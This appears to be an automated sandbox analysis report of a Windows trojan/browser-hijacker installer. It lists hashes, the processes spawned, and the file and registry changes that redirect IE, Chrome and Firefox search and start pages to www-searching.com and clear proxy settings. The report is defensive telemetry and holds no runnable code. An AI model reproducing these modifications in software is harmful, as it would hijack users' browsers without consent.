HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.746779 (B) (Emsisoft), Gen:Variant.Kazy.746779 (AdAware), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 16f4b6f13e3e20e37edf9403c894fe80
SHA1: 73429446915087ec7b4ae2cc5a68f13f9d3c0150
SHA256: 294883e4d17afba42cfd8dddbbbdca386d1ce67e25bd743e75deb07fb4c592f9
SSDeep: 24576:qTJMjonewo QkE3pGq/g8LaGCCmH/u pvFfU jEBbTr/:YeDwoFk0pfLPCCmH/dlFxEBbTr/
Size: 1085952 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-10-10 06:19:11
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
smu.exe:2540
smu.exe:3356
sma.exe:308
sma.exe:4008
sma.exe:3164
sma.exe:3192
%original file name%.exe:3380
%original file name%.exe:264
smp.exe:3444
smp.exe:2836
tcpsvcs.exe:3488
tcpsvcs.exe:1504
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process smu.exe:2540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
The process smu.exe:3356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Temp\Pre83CF.tmp (601 bytes)
C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
C:\Windows\Temp\Pre93AB.tmp (601 bytes)
C:\Windows\Temp\Web93AC.tmp (63 bytes)
C:\Windows\Temp\Pre83E0.tmp (601 bytes)
C:\Windows\Temp\Web83D0.tmp (63 bytes)
C:\Windows\Temp\Web83E1.tmp (63 bytes)
The Trojan deletes the following file(s):
C:\Windows\Temp\Pre93AB.tmp (0 bytes)
C:\Windows\Temp\Pre83CF.tmp (0 bytes)
C:\Windows\Temp\Pre83E0.tmp (0 bytes)
The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_13704\%original file name%.exe (7433 bytes)
The process %original file name%.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Installytd_6828\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll (1192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_9822\%original file name%.exe (7433 bytes)
The process smp.exe:3444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
The process smp.exe:2836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (1 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Search.lnk (1 bytes)
The process tcpsvcs.exe:3488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\search-metadata.json (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (11028 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\searchplugins\smod.xml (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (9416 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (388 bytes)
The process tcpsvcs.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (7392 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (12 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF8.tmp (245963 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smp.exe (6584 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EFA.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsc6EE8.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (0 bytes)
Registry activity
The process smu.exe:2540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "40 CB 63 41 C7 74 17 84 EA 5E F9 24 AE E1 DA 8A"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Wow6432Node\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Spt" = "1B 39 48 C8 E0 BD 90 00 51 86 E1 DD 14 43 97 BC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "80 46 55 E5 90 D4 4A C0 31 0A 29 D6 59 11 73 09"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process smu.exe:3356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Rlt" = "Type: REG_QWORD, Length: 8"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "46 A0 C0 5B 56 BA 84 71 70 9D 4F 8D 92 7C EE 47"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Ult" = "Type: REG_QWORD, Length: 8"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sma.exe:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"FileTracingMask" = "4294901760"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sma.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sma.exe:3164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sma.exe:3192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{E549E976-C5F2-4E77-819D-55BC9B7C25BC}"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0C 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\SearchModulePlus\Success]
"Install" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\SearchModulePlus\Success]
"InstallStr" = "ok"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process smp.exe:3444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
The process smp.exe:2836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesVersion" = "2"
"Favorites" = "00 7C 01 00 00 14 00 1F 80 C8 27 34 1F 10 5C 10"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"@zipfldr.dll,-10148" = "Compressed (zipped) folder"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesChanges" = "9"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32]
"FXSRESM.dll,-120" = "Fax recipient"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesResolve" = "CC 02 00 00 4C 00 00 00 01 14 02 00 00 00 00 00"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
"@sendmail.dll,-21" = "Desktop (create shortcut)"
"@sendmail.dll,-4" = "Mail recipient"
The process tcpsvcs.exe:3488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"
"URL" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"(Default)" = "Type: REG_SZ, Length: 0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURLFallback" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"SuggestionsURLFallback" = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IE8SSC&market={language}"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"DisplayName" = "Search Module"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"DisplayName" = "Bing"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"URL" = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"SuggestionsURLFallback" = "http://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"TopResultURLFallback" = "http://www.bing.com/search?q={searchTerms}&src=ie9tr"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www-searching.com/?pid=s&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&vp=ch&prd=set"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www-searching.com/favicon.ico"
"SuggestionsURL" = "http://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}"
